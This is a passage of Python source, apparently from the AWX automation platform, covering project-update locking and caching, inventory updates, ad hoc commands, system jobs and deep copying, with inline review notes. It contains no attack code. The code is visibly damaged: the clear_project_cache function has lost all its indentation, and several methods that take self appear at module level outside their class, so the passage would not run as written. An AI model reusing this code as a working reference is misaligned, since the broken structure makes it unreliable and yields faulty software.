        fcntl.lockf(fd, fcntl.LOCK_UN)
    except IOError as e:
        logger.error("I/O error({0}) while trying to release lock file [{1}]: {2}".format(e.errno, instance.get_lock_file(), e.strerror))
        # Close the descriptor even when the unlock fails, then re-raise.
        os.close(fd)
        raise
    os.close(fd)
    self.lock_fd = None
'''
Note: We don't support blocking=False
'''

def acquire_lock(self, instance, blocking=True):
    """
    Open the instance's lock file and poll (1s interval) for an exclusive
    flock, returning early if the update is canceled.  The descriptor is
    stored on self.lock_fd; pair with release_lock().
    """
    lock_path = instance.get_lock_file()
    if lock_path is None:
        # If from migration or someone blanked local_path for any other reason, recoverable by save
        instance.save()
        lock_path = instance.get_lock_file()
        if lock_path is None:
            raise RuntimeError(u'Invalid lock file path')

    try:
        self.lock_fd = os.open(lock_path, os.O_RDWR | os.O_CREAT)
    except OSError as e:
        logger.error("I/O error({0}) while trying to open lock file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
        raise

    start_time = time.time()
    while True:
        try:
            # Re-check the cancel flag on every attempt so a canceled update
            # does not sit in the polling loop forever.
            instance.refresh_from_db(fields=['cancel_flag'])
            if instance.cancel_flag:
                logger.debug("ProjectUpdate({0}) was canceled".format(instance.pk))
                return
            fcntl.lockf(self.lock_fd, fcntl.LOCK_EX | fcntl.LOCK_NB)
            break
        except IOError as e:
            # EAGAIN/EACCES mean the lock is held elsewhere — keep polling;
            # anything else is a real error.
            if e.errno not in (errno.EAGAIN, errno.EACCES):
                os.close(self.lock_fd)
                logger.error("I/O error({0}) while trying to aquire lock on file [{1}]: {2}".format(e.errno, lock_path, e.strerror))
                raise
            else:
                time.sleep(1.0)
    waiting_time = time.time() - start_time

    if waiting_time > 1.0:
        logger.info('{} spent {} waiting to acquire lock for local source tree ' 'for path {}.'.format(instance.log_format, waiting_time, lock_path))
def pre_run_hook(self, instance, private_data_dir):
    """
    Prepare the filesystem for a project update: take the project lock,
    remember the current git branch for branch-override runs, create the
    project and cache staging folders, and stage the bundled playbooks.
    """
    super(RunProjectUpdate, self).pre_run_hook(instance, private_data_dir)
    # re-create root project folder if a natural disaster has destroyed it
    if not os.path.exists(settings.PROJECTS_ROOT):
        os.mkdir(settings.PROJECTS_ROOT)
    project_path = instance.project.get_project_path(check_if_exists=False)
    self.acquire_lock(instance)
    self.original_branch = None
    if instance.scm_type == 'git' and instance.branch_override:
        if os.path.exists(project_path):
            git_repo = git.Repo(project_path)
            # Remember the commit (detached HEAD) or branch so post_run_hook
            # can restore the repo after the override run.
            if git_repo.head.is_detached:
                self.original_branch = git_repo.head.commit
            else:
                self.original_branch = git_repo.active_branch

    if not os.path.exists(project_path):
        os.makedirs(project_path)  # used as container mount

    stage_path = os.path.join(instance.get_cache_path(), 'stage')
    if os.path.exists(stage_path):
        logger.warning('{0} unexpectedly existed before update'.format(stage_path))
        shutil.rmtree(stage_path)
    os.makedirs(stage_path)  # presence of empty cache indicates lack of roles or collections

    # the project update playbook is not in a git repo, but uses a vendoring directory
    # to be consistent with the ansible-runner model,
    # that is moved into the runner project folder here
    awx_playbooks = self.get_path_to('..', 'playbooks')
    copy_tree(awx_playbooks, os.path.join(private_data_dir, 'project'))
@staticmethod
def clear_project_cache(cache_dir, keep_value):
if os.path.isdir(cache_dir):
for entry in os.listdir(cache_dir):
old_path = os.path.join(cache_dir, entry)
if entry not in (keep_value, 'stage'):
# invalidate, then delete
new_path = os.path.join(cache_dir, '.~~delete~~' + entry)
try:
os.rename(old_path, new_path)
shutil.rmtree(new_path)
except OSError:
logger.warning(f"Could not remove cache directory {old_path}")
@staticmethod
def make_local_copy(p, job_private_data_dir, scm_revision=None):
    """Copy project content (roles and collections) to a job private_data_dir

    :param object p: Either a project or a project update
    :param str job_private_data_dir: The root of the target ansible-runner folder
    :param str scm_revision: For branch_override cases, the git revision to copy
    """
    project_path = p.get_project_path(check_if_exists=False)
    destination_folder = os.path.join(job_private_data_dir, 'project')
    # NOTE(review): scm_revision is resolved here but not referenced again
    # below (the clone uses p.scm_revision directly) — looks vestigial.
    if not scm_revision:
        scm_revision = p.scm_revision

    if p.scm_type == 'git':
        git_repo = git.Repo(project_path)
        if not os.path.exists(destination_folder):
            os.mkdir(destination_folder, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)

        # Clone from a throwaway local branch pinned at the job revision.
        tmp_branch_name = 'awx_internal/{}'.format(uuid4())
        # always clone based on specific job revision
        if not p.scm_revision:
            raise RuntimeError('Unexpectedly could not determine a revision to run from project.')
        source_branch = git_repo.create_head(tmp_branch_name, p.scm_revision)
        # git clone must take file:// syntax for source repo or else options like depth will be ignored
        source_as_uri = Path(project_path).as_uri()
        git.Repo.clone_from(
            source_as_uri,
            destination_folder,
            branch=source_branch,
            depth=1,
            single_branch=True,  # shallow, do not copy full history
        )
        # submodules copied in loop because shallow copies from local HEADs are ideal
        # and no git clone submodule options are compatible with minimum requirements
        for submodule in git_repo.submodules:
            subrepo_path = os.path.abspath(os.path.join(project_path, submodule.path))
            subrepo_destination_folder = os.path.abspath(os.path.join(destination_folder, submodule.path))
            subrepo_uri = Path(subrepo_path).as_uri()
            git.Repo.clone_from(subrepo_uri, subrepo_destination_folder, depth=1, single_branch=True)
        # force option is necessary because remote refs are not counted, although no information is lost
        git_repo.delete_head(tmp_branch_name, force=True)
    else:
        copy_tree(project_path, destination_folder, preserve_symlinks=1)

    # copy over the roles and collection cache to job folder
    cache_path = os.path.join(p.get_cache_path(), p.cache_id)
    subfolders = []
    if settings.AWX_COLLECTIONS_ENABLED:
        subfolders.append('requirements_collections')
    if settings.AWX_ROLES_ENABLED:
        subfolders.append('requirements_roles')
    for subfolder in subfolders:
        cache_subpath = os.path.join(cache_path, subfolder)
        if os.path.exists(cache_subpath):
            dest_subpath = os.path.join(job_private_data_dir, subfolder)
            copy_tree(cache_subpath, dest_subpath, preserve_symlinks=1)
            logger.debug('{0} {1} prepared {2} from cache'.format(type(p).__name__, p.pk, dest_subpath))
def post_run_hook(self, instance, status):
    """
    Finalize a project update: persist the new revision, promote the staged
    role/collection cache, copy content for a dependent job, restore an
    overridden git branch, and kick off dependent inventory updates.
    """
    super(RunProjectUpdate, self).post_run_hook(instance, status)
    # To avoid hangs, very important to release lock even if errors happen here
    try:
        if self.playbook_new_revision:
            instance.scm_revision = self.playbook_new_revision
            instance.save(update_fields=['scm_revision'])

        # Roles and collection folders copy to durable cache
        base_path = instance.get_cache_path()
        stage_path = os.path.join(base_path, 'stage')
        if status == 'successful' and 'install_' in instance.job_tags:
            # Clear other caches before saving this one, and if branch is overridden
            # do not clear cache for main branch, but do clear it for other branches
            self.clear_project_cache(base_path, keep_value=instance.project.cache_id)
            cache_path = os.path.join(base_path, instance.cache_id)
            if os.path.exists(stage_path):
                if os.path.exists(cache_path):
                    logger.warning('Rewriting cache at {0}, performance may suffer'.format(cache_path))
                    shutil.rmtree(cache_path)
                # Atomic promotion of the staged cache.
                os.rename(stage_path, cache_path)
                logger.debug('{0} wrote to cache at {1}'.format(instance.log_format, cache_path))
        elif os.path.exists(stage_path):
            shutil.rmtree(stage_path)  # cannot trust content update produced

        if self.job_private_data_dir:
            if status == 'successful':
                # copy project folder before resetting to default branch
                # because some git-tree-specific resources (like submodules) might matter
                self.make_local_copy(instance, self.job_private_data_dir)
            if self.original_branch:
                # for git project syncs, non-default branches can be problems
                # restore to branch the repo was on before this run
                try:
                    self.original_branch.checkout()
                except Exception:
                    # this could have failed due to dirty tree, but difficult to predict all cases
                    logger.exception('Failed to restore project repo to prior state after {}'.format(instance.log_format))
    finally:
        self.release_lock(instance)

    p = instance.project
    if instance.job_type == 'check' and status not in (
        'failed',
        'canceled',
    ):
        if self.playbook_new_revision:
            p.scm_revision = self.playbook_new_revision
        else:
            if status == 'successful':
                logger.error("{} Could not find scm revision in check".format(instance.log_format))
        p.playbook_files = p.playbooks
        p.inventory_files = p.inventories
        p.save(update_fields=['scm_revision', 'playbook_files', 'inventory_files'])

    # Update any inventories that depend on this project
    dependent_inventory_sources = p.scm_inventory_sources.filter(update_on_project_update=True)
    if len(dependent_inventory_sources) > 0:
        if status == 'successful' and instance.launch_type != 'sync':
            self._update_dependent_inventories(instance, dependent_inventory_sources)
def build_execution_environment_params(self, instance, private_data_dir):
    """
    Extend the base EE params with bind-mounts for the project source tree
    and its cache directory.  K8S deployments return no extra params.
    """
    if settings.IS_K8S:
        return {}
    params = super(RunProjectUpdate, self).build_execution_environment_params(instance, private_data_dir)
    project_path = instance.get_project_path(check_if_exists=False)
    cache_path = instance.get_cache_path()
    mounts = params.setdefault('container_volume_mounts', [])
    mounts.append(f"{project_path}:{project_path}:Z")
    mounts.append(f"{cache_path}:{cache_path}:Z")
    return params
@task(queue=get_local_queuename)
class RunInventoryUpdate(BaseTask):
    """Dispatchable task that runs a single InventoryUpdate.

    Runs ``ansible-inventory`` against the configured source inside an
    execution environment, then imports the resulting JSON output into the
    database in :meth:`post_run_hook`.
    """

    model = InventoryUpdate
    event_model = InventoryUpdateEvent
    event_data_key = 'inventory_update_id'

    def build_private_data(self, inventory_update, private_data_dir):
        """
        Return private data needed for inventory update.

        Returns a dict of the form
        {
            'credentials': {
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
            }
        }

        If no private data is needed, return None.
        """
        # Delegate to the source-specific injector (ec2, gce, ...) when one is
        # registered; sources without an injector implicitly return None.
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[inventory_update.source]()
            return injector.build_private_data(inventory_update, private_data_dir)

    def build_env(self, inventory_update, private_data_dir, private_data_files=None):
        """Build environment dictionary for ansible-inventory.

        Most environment variables related to credentials or configuration
        are accomplished by the inventory source injectors (in this method)
        or custom credential type injectors (in main run method).
        """
        env = super(RunInventoryUpdate, self).build_env(inventory_update, private_data_dir, private_data_files=private_data_files)

        if private_data_files is None:
            private_data_files = {}
        # Pass inventory source ID to inventory script.
        env['INVENTORY_SOURCE_ID'] = str(inventory_update.inventory_source_id)
        env['INVENTORY_UPDATE_ID'] = str(inventory_update.pk)
        env.update(STANDARD_INVENTORY_UPDATE_ENV)

        injector = None
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[inventory_update.source]()

        if injector is not None:
            env = injector.build_env(inventory_update, env, private_data_dir, private_data_files)
            # All CLOUD_PROVIDERS sources implement as inventory plugin from collection
            env['ANSIBLE_INVENTORY_ENABLED'] = 'auto'

        if inventory_update.source == 'scm':
            # Pass through user-supplied source vars as env vars, unless they
            # would override an existing value or are explicitly blocked.
            for env_k in inventory_update.source_vars_dict:
                if str(env_k) not in env and str(env_k) not in settings.INV_ENV_VARIABLE_BLOCKED:
                    env[str(env_k)] = str(inventory_update.source_vars_dict[env_k])
        elif inventory_update.source == 'file':
            raise NotImplementedError('Cannot update file sources through the task system.')

        if inventory_update.source == 'scm' and inventory_update.source_project_update:
            env_key = 'ANSIBLE_COLLECTIONS_PATHS'
            config_setting = 'collections_paths'
            folder = 'requirements_collections'
            default = '~/.ansible/collections:/usr/share/ansible/collections'
            config_values = read_ansible_config(os.path.join(private_data_dir, 'project'), [config_setting])
            paths = default.split(':')
            # NOTE(review): these loops prepend the *entire* joined env/config
            # value once per path missing from the defaults, so a value with two
            # new paths is prepended twice -- looks unintended, confirm.
            if env_key in env:
                for path in env[env_key].split(':'):
                    if path not in paths:
                        paths = [env[env_key]] + paths
            elif config_setting in config_values:
                for path in config_values[config_setting].split(':'):
                    if path not in paths:
                        paths = [config_values[config_setting]] + paths
            # The project-local requirements_collections folder takes priority.
            paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
            env[env_key] = os.pathsep.join(paths)

        # Always append the bundled automation-controller collections location.
        if 'ANSIBLE_COLLECTIONS_PATHS' in env:
            paths = env['ANSIBLE_COLLECTIONS_PATHS'].split(':')
        else:
            paths = ['~/.ansible/collections', '/usr/share/ansible/collections']
        paths.append('/usr/share/automation-controller/collections')
        env['ANSIBLE_COLLECTIONS_PATHS'] = os.pathsep.join(paths)

        return env

    def write_args_file(self, private_data_dir, args):
        """Write the command line to an 'args' file readable only by the owner."""
        path = os.path.join(private_data_dir, 'args')
        handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
        f = os.fdopen(handle, 'w')
        f.write(' '.join(args))
        f.close()
        # Drop to read-only once written; the file may hold sensitive values.
        os.chmod(path, stat.S_IRUSR)
        return path

    def build_args(self, inventory_update, private_data_dir, passwords):
        """Build the command line argument list for running an inventory
        import.
        """
        # Get the inventory source and inventory.
        inventory_source = inventory_update.inventory_source
        inventory = inventory_source.inventory

        if inventory is None:
            raise RuntimeError('Inventory Source is not associated with an Inventory.')

        args = ['ansible-inventory', '--list', '--export']

        # Add arguments for the source inventory file/script/thing
        rel_path = self.pseudo_build_inventory(inventory_update, private_data_dir)
        container_location = os.path.join(CONTAINER_ROOT, rel_path)
        source_location = os.path.join(private_data_dir, rel_path)

        args.append('-i')
        args.append(container_location)
        # Results land in the artifacts dir; post_run_hook reads them back.
        args.append('--output')
        args.append(os.path.join(CONTAINER_ROOT, 'artifacts', str(inventory_update.id), 'output.json'))

        if os.path.isdir(source_location):
            playbook_dir = container_location
        else:
            playbook_dir = os.path.dirname(container_location)
        args.extend(['--playbook-dir', playbook_dir])

        # ansible-inventory verbosity is doubled (+1) relative to the update's
        # verbosity setting, capped at -vvvvv.
        if inventory_update.verbosity:
            args.append('-' + 'v' * min(5, inventory_update.verbosity * 2 + 1))

        return args

    def build_inventory(self, inventory_update, private_data_dir):
        return None  # what runner expects in order to not deal with inventory

    def pseudo_build_inventory(self, inventory_update, private_data_dir):
        """Inventory imports are ran through a management command
        we pass the inventory in args to that command, so this is not considered
        to be "Ansible" inventory (by runner) even though it is
        Eventually, we would like to cut out the management command,
        and thus use this as the real inventory

        Returns the inventory file/dir path relative to private_data_dir.
        """
        src = inventory_update.source

        injector = None
        if inventory_update.source in InventorySource.injectors:
            injector = InventorySource.injectors[src]()

        if injector is not None:
            content = injector.inventory_contents(inventory_update, private_data_dir)
            # must be a statically named file
            inventory_path = os.path.join(private_data_dir, 'inventory', injector.filename)
            with open(inventory_path, 'w') as f:
                f.write(content)
            os.chmod(inventory_path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
            rel_path = os.path.join('inventory', injector.filename)
        elif src == 'scm':
            rel_path = os.path.join('project', inventory_update.source_path)

        # NOTE(review): for a source with neither an injector nor src == 'scm',
        # rel_path is unbound here and this raises UnboundLocalError -- confirm
        # all reachable sources are covered.
        return rel_path

    def build_playbook_path_relative_to_cwd(self, inventory_update, private_data_dir):
        # Inventory updates run no playbook.
        return None

    def build_credentials_list(self, inventory_update):
        # All credentials not used by inventory source injector
        return inventory_update.get_extra_credentials()

    def pre_run_hook(self, inventory_update, private_data_dir):
        """Run a project sync first when the inventory source lives in SCM."""
        super(RunInventoryUpdate, self).pre_run_hook(inventory_update, private_data_dir)
        source_project = None
        if inventory_update.inventory_source:
            source_project = inventory_update.inventory_source.source_project
        if (
            inventory_update.source == 'scm' and inventory_update.launch_type != 'scm' and source_project and source_project.scm_type
        ):  # never ever update manual projects
            # Check if the content cache exists, so that we do not unnecessarily re-download roles
            sync_needs = ['update_{}'.format(source_project.scm_type)]
            has_cache = os.path.exists(os.path.join(source_project.get_cache_path(), source_project.cache_id))
            # Galaxy requirements are not supported for manual projects
            if not has_cache:
                sync_needs.extend(['install_roles', 'install_collections'])

            # Run the sync inline (same node, same private data dir) as a
            # dependent ProjectUpdate.
            local_project_sync = source_project.create_project_update(
                _eager_fields=dict(
                    launch_type="sync",
                    job_type='run',
                    job_tags=','.join(sync_needs),
                    status='running',
                    execution_node=inventory_update.execution_node,
                    instance_group=inventory_update.instance_group,
                    celery_task_id=inventory_update.celery_task_id,
                )
            )
            # associate the inventory update before calling run() so that a
            # cancel() call on the inventory update can cancel the project update
            local_project_sync.scm_inventory_updates.add(inventory_update)

            project_update_task = local_project_sync._get_task_class()
            try:
                sync_task = project_update_task(job_private_data_dir=private_data_dir)
                sync_task.run(local_project_sync.id)
                local_project_sync.refresh_from_db()
                inventory_update.inventory_source.scm_last_revision = local_project_sync.scm_revision
                inventory_update.inventory_source.save(update_fields=['scm_last_revision'])
            except Exception:
                # Mark the inventory update failed, pointing at the sync that broke it.
                inventory_update = self.update_model(
                    inventory_update.pk,
                    status='failed',
                    job_explanation=(
                        'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
                        % ('project_update', local_project_sync.name, local_project_sync.id)
                    ),
                )
                raise
        elif inventory_update.source == 'scm' and inventory_update.launch_type == 'scm' and source_project:
            # This follows update, not sync, so make copy here
            RunProjectUpdate.make_local_copy(source_project, private_data_dir)

    def post_run_hook(self, inventory_update, status):
        """On success, parse ansible-inventory output and import it into the DB."""
        super(RunInventoryUpdate, self).post_run_hook(inventory_update, status)
        if status != 'successful':
            return  # nothing to save, step out of the way to allow error reporting

        private_data_dir = inventory_update.job_env['AWX_PRIVATE_DATA_DIR']
        expected_output = os.path.join(private_data_dir, 'artifacts', 'output.json')
        with open(expected_output) as f:
            data = json.load(f)

        # build inventory save options
        options = dict(
            overwrite=inventory_update.overwrite,
            overwrite_vars=inventory_update.overwrite_vars,
        )
        src = inventory_update.source

        if inventory_update.enabled_var:
            options['enabled_var'] = inventory_update.enabled_var
            options['enabled_value'] = inventory_update.enabled_value
        else:
            # Fall back to per-source settings, e.g. EC2_ENABLED_VAR.
            if getattr(settings, '%s_ENABLED_VAR' % src.upper(), False):
                options['enabled_var'] = getattr(settings, '%s_ENABLED_VAR' % src.upper())
            if getattr(settings, '%s_ENABLED_VALUE' % src.upper(), False):
                options['enabled_value'] = getattr(settings, '%s_ENABLED_VALUE' % src.upper())

        if inventory_update.host_filter:
            options['host_filter'] = inventory_update.host_filter

        # NOTE(review): unlike the other settings lookups in this method, this
        # getattr() has no default -- a source without <SRC>_EXCLUDE_EMPTY_GROUPS
        # defined would raise AttributeError. Confirm all sources define it.
        if getattr(settings, '%s_EXCLUDE_EMPTY_GROUPS' % src.upper()):
            options['exclude_empty_groups'] = True
        if getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper(), False):
            options['instance_id_var'] = getattr(settings, '%s_INSTANCE_ID_VAR' % src.upper())

        # Verbosity is applied to saving process, as well as ansible-inventory CLI option
        if inventory_update.verbosity:
            options['verbosity'] = inventory_update.verbosity

        # Route the import command's log records through our event pipeline so
        # they appear as job events, continuing the existing counters.
        handler = SpecialInventoryHandler(
            self.event_handler,
            self.cancel_callback,
            verbosity=inventory_update.verbosity,
            job_timeout=self.get_instance_timeout(self.instance),
            start_time=inventory_update.started,
            counter=self.event_ct,
            initial_line=self.end_line,
        )
        inv_logger = logging.getLogger('awx.main.commands.inventory_import')
        formatter = inv_logger.handlers[0].formatter
        formatter.job_start = inventory_update.started
        handler.formatter = formatter
        inv_logger.handlers[0] = handler

        from awx.main.management.commands.inventory_import import Command as InventoryImportCommand

        cmd = InventoryImportCommand()
        try:
            # save the inventory data to database.
            # canceling exceptions will be handled in the global post_run_hook
            cmd.perform_update(options, data, inventory_update)
        except PermissionDenied as exc:
            logger.exception('License error saving {} content'.format(inventory_update.log_format))
            raise PostRunError(str(exc), status='error')
        except PostRunError:
            logger.exception('Error saving {} content, rolling back changes'.format(inventory_update.log_format))
            raise
        except Exception:
            logger.exception('Exception saving {} content, rolling back changes.'.format(inventory_update.log_format))
            raise PostRunError('Error occured while saving inventory data, see traceback or server logs', status='error', tb=traceback.format_exc())
@task(queue=get_local_queuename)
class RunAdHocCommand(BaseTask):
    """
    Run an ad hoc command using ansible.
    """

    model = AdHocCommand
    event_model = AdHocCommandEvent
    event_data_key = 'ad_hoc_command_id'

    def build_private_data(self, ad_hoc_command, private_data_dir):
        """
        Return SSH private key data needed for this ad hoc command (only if
        stored in DB as ssh_key_data).

        Returns a dict of the form
        {
            'credentials': {
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                <awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
                ...
            },
            'certificates': {
                <awx.main.models.Credential>: <signed SSH certificate data>,
                <awx.main.models.Credential>: <signed SSH certificate data>,
                ...
            }
        }
        """
        # If we were sent SSH credentials, decrypt them and send them
        # back (they will be written to a temporary file).
        creds = ad_hoc_command.credential
        private_data = {'credentials': {}}
        if creds and creds.has_input('ssh_key_data'):
            private_data['credentials'][creds] = creds.get_input('ssh_key_data', default='')
        if creds and creds.has_input('ssh_public_key_data'):
            private_data.setdefault('certificates', {})[creds] = creds.get_input('ssh_public_key_data', default='')

        return private_data

    def build_passwords(self, ad_hoc_command, runtime_passwords):
        """
        Build a dictionary of passwords for SSH private key, SSH user and
        sudo/su.
        """
        passwords = super(RunAdHocCommand, self).build_passwords(ad_hoc_command, runtime_passwords)
        cred = ad_hoc_command.credential
        if cred:
            for field in ('ssh_key_unlock', 'ssh_password', 'become_password'):
                # Prompt-supplied values win over stored credential values;
                # 'ssh_password' maps to the credential's 'password' input.
                value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
                if value not in ('', 'ASK'):
                    passwords[field] = value
        return passwords

    def build_env(self, ad_hoc_command, private_data_dir, private_data_files=None):
        """
        Build environment dictionary for ansible.
        """
        env = super(RunAdHocCommand, self).build_env(ad_hoc_command, private_data_dir, private_data_files=private_data_files)
        # Set environment variables needed for inventory and ad hoc event
        # callbacks to work.
        env['AD_HOC_COMMAND_ID'] = str(ad_hoc_command.pk)
        env['INVENTORY_ID'] = str(ad_hoc_command.inventory.pk)
        env['INVENTORY_HOSTVARS'] = str(True)
        env['ANSIBLE_LOAD_CALLBACK_PLUGINS'] = '1'
        env['ANSIBLE_SFTP_BATCH_MODE'] = 'False'

        return env

    def build_args(self, ad_hoc_command, private_data_dir, passwords):
        """
        Build command line argument list for running ansible, optionally using
        ssh-agent for public/private key authentication.
        """
        creds = ad_hoc_command.credential
        ssh_username, become_username, become_method = '', '', ''
        if creds:
            ssh_username = creds.get_input('username', default='')
            become_method = creds.get_input('become_method', default='')
            become_username = creds.get_input('become_username', default='')
        else:
            become_method = None
            become_username = ""
        # Always specify the normal SSH user as root by default.  Since this
        # task is normally running in the background under a service account,
        # it doesn't make sense to rely on ansible's default of using the
        # current user.
        ssh_username = ssh_username or 'root'
        args = []
        if ad_hoc_command.job_type == 'check':
            args.append('--check')
        args.extend(['-u', sanitize_jinja(ssh_username)])
        if 'ssh_password' in passwords:
            args.append('--ask-pass')
        # We only specify sudo/su user and password if explicitly given by the
        # credential.  Credential should never specify both sudo and su.
        if ad_hoc_command.become_enabled:
            args.append('--become')
        if become_method:
            args.extend(['--become-method', sanitize_jinja(become_method)])
        if become_username:
            args.extend(['--become-user', sanitize_jinja(become_username)])
        if 'become_password' in passwords:
            args.append('--ask-become-pass')

        if ad_hoc_command.forks:  # FIXME: Max limit?
            args.append('--forks=%d' % ad_hoc_command.forks)
        if ad_hoc_command.diff_mode:
            args.append('--diff')
        if ad_hoc_command.verbosity:
            args.append('-%s' % ('v' * min(5, ad_hoc_command.verbosity)))

        # NOTE(review): extra_vars built below is never appended to args (the
        # vars file is written by build_extra_vars_file); only the prohibited-
        # variable validation side effect matters here -- presumably
        # intentional duplication, confirm.
        extra_vars = ad_hoc_command.awx_meta_vars()

        if ad_hoc_command.extra_vars_dict:
            redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
            if removed_vars:
                raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
            extra_vars.update(ad_hoc_command.extra_vars_dict)

        if ad_hoc_command.limit:
            args.append(ad_hoc_command.limit)
        else:
            args.append('all')

        return args

    def build_extra_vars_file(self, ad_hoc_command, private_data_dir):
        """Write AWX meta vars plus user extra vars, rejecting prohibited ones."""
        extra_vars = ad_hoc_command.awx_meta_vars()

        if ad_hoc_command.extra_vars_dict:
            redacted_extra_vars, removed_vars = extract_ansible_vars(ad_hoc_command.extra_vars_dict)
            if removed_vars:
                raise ValueError(_("{} are prohibited from use in ad hoc commands.").format(", ".join(removed_vars)))
            extra_vars.update(ad_hoc_command.extra_vars_dict)
        self._write_extra_vars_file(private_data_dir, extra_vars)

    def build_module_name(self, ad_hoc_command):
        return ad_hoc_command.module_name

    def build_module_args(self, ad_hoc_command):
        # Sanitize Jinja unless the installation explicitly always allows it.
        module_args = ad_hoc_command.module_args
        if settings.ALLOW_JINJA_IN_EXTRA_VARS != 'always':
            module_args = sanitize_jinja(module_args)
        return module_args

    def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
        # Ad hoc commands run no playbook.
        return None

    def get_password_prompts(self, passwords={}):
        """Map expected interactive prompt regexes to password names.

        NOTE(review): mutable default argument, and `passwords` is unused
        (the super() call also does not forward it) -- harmless as written,
        but worth cleaning up.
        """
        d = super(RunAdHocCommand, self).get_password_prompts()
        d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
        d[r'Bad passphrase, try again for .*:\s*?$'] = ''
        for method in PRIVILEGE_ESCALATION_METHODS:
            d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
            d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
        d[r'BECOME password.*:\s*?$'] = 'become_password'
        d[r'SSH password:\s*?$'] = 'ssh_password'
        d[r'Password:\s*?$'] = 'ssh_password'
        return d
@task(queue=get_local_queuename)
class RunSystemJob(BaseTask):
    """Run a management job (cleanup_jobs, cleanup_activitystream, ...) via awx-manage."""

    model = SystemJob
    event_model = SystemJobEvent
    event_data_key = 'system_job_id'

    def build_execution_environment_params(self, system_job, private_data_dir):
        # System jobs run directly on the control plane, not in a container.
        return {}

    def build_args(self, system_job, private_data_dir, passwords):
        """Build the awx-manage command line from the job type and extra_vars."""
        args = ['awx-manage', system_job.job_type]
        try:
            # System Job extra_vars can be blank, must be JSON if not blank
            if system_job.extra_vars == '':
                json_vars = {}
            else:
                json_vars = json.loads(system_job.extra_vars)
            if system_job.job_type in ('cleanup_jobs', 'cleanup_activitystream'):
                if 'days' in json_vars:
                    args.extend(['--days', str(json_vars.get('days', 60))])
                if 'dry_run' in json_vars and json_vars['dry_run']:
                    args.extend(['--dry-run'])
            if system_job.job_type == 'cleanup_jobs':
                args.extend(
                    ['--jobs', '--project-updates', '--inventory-updates', '--management-jobs', '--ad-hoc-commands', '--workflow-jobs', '--notifications']
                )
        except Exception:
            # Bad extra_vars should not block the job; run with defaults.
            logger.exception("{} Failed to parse system job".format(system_job.log_format))
        return args

    def write_args_file(self, private_data_dir, args):
        # NOTE(review): byte-for-byte duplicate of
        # RunInventoryUpdate.write_args_file -- a shared helper would avoid drift.
        path = os.path.join(private_data_dir, 'args')
        handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
        f = os.fdopen(handle, 'w')
        f.write(' '.join(args))
        f.close()
        os.chmod(path, stat.S_IRUSR)
        return path

    def build_env(self, instance, private_data_dir, private_data_files=None):
        base_env = super(RunSystemJob, self).build_env(instance, private_data_dir, private_data_files=private_data_files)
        # TODO: this is able to run by turning off isolation
        # the goal is to run it a container instead
        env = dict(os.environ.items())
        env.update(base_env)
        return env

    def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
        # System jobs run no playbook.
        return None

    def build_inventory(self, instance, private_data_dir):
        # System jobs need no inventory.
        return None
def _reconstruct_relationships(copy_mapping):
    """Re-wire preserved relationships on deep-copied objects.

    For every (original, copy) pair in ``copy_mapping``, walk the model's
    FIELDS_TO_PRESERVE_AT_COPY list and point each foreign-key / many-to-many
    field of the copy at the copied counterpart of the original's related
    object (falling back to the original related object when it was not
    itself copied). Saves each copy afterwards.
    """
    for src_obj, dst_obj in copy_mapping.items():
        cls = type(src_obj)
        for name in getattr(cls, 'FIELDS_TO_PRESERVE_AT_COPY', []):
            descriptor = cls._meta.get_field(name)
            if isinstance(descriptor, ForeignKey):
                # Do not clobber a FK the copy already has set.
                if getattr(dst_obj, name, None):
                    continue
                target = getattr(src_obj, name)
                setattr(dst_obj, name, copy_mapping.get(target, target))
            elif descriptor.many_to_many:
                for target in getattr(src_obj, name).all():
                    logger.debug('Deep copy: Adding {} to {}({}).{} relationship'.format(target, dst_obj, cls, name))
                    getattr(dst_obj, name).add(copy_mapping.get(target, target))
        dst_obj.save()
@task(queue=get_local_queuename)
def deep_copy_model_obj(model_module, model_name, obj_pk, new_obj_pk, user_pk, uuid, permission_check_func=None):
    """Asynchronously copy sub-objects from one model instance to another.

    The list of sub-objects to copy is staged in the cache under ``uuid`` by
    the API view that launched this task. All model references arrive as
    (module path, class name, pk) so they can be re-imported in the worker.
    ``permission_check_func``, if given, is a (module, class, attr) triple
    resolved to a callable that validates the creator's access to the copies.
    """
    sub_obj_list = cache.get(uuid)
    if sub_obj_list is None:
        # Cache entry expired or was never written; nothing we can do.
        logger.error('Deep copy {} from {} to {} failed unexpectedly.'.format(model_name, obj_pk, new_obj_pk))
        return

    logger.debug('Deep copy {} from {} to {}.'.format(model_name, obj_pk, new_obj_pk))
    # Local imports avoid circular dependencies at module load time.
    from awx.api.generics import CopyAPIView
    from awx.main.signals import disable_activity_stream

    model = getattr(importlib.import_module(model_module), model_name, None)
    if model is None:
        return
    try:
        obj = model.objects.get(pk=obj_pk)
        new_obj = model.objects.get(pk=new_obj_pk)
        creater = User.objects.get(pk=user_pk)
    except ObjectDoesNotExist:
        logger.warning("Object or user no longer exists.")
        return
    # Copy everything in one transaction, with activity stream and inventory
    # computed-field updates suppressed for the duration.
    with transaction.atomic(), ignore_inventory_computed_fields(), disable_activity_stream():
        copy_mapping = {}
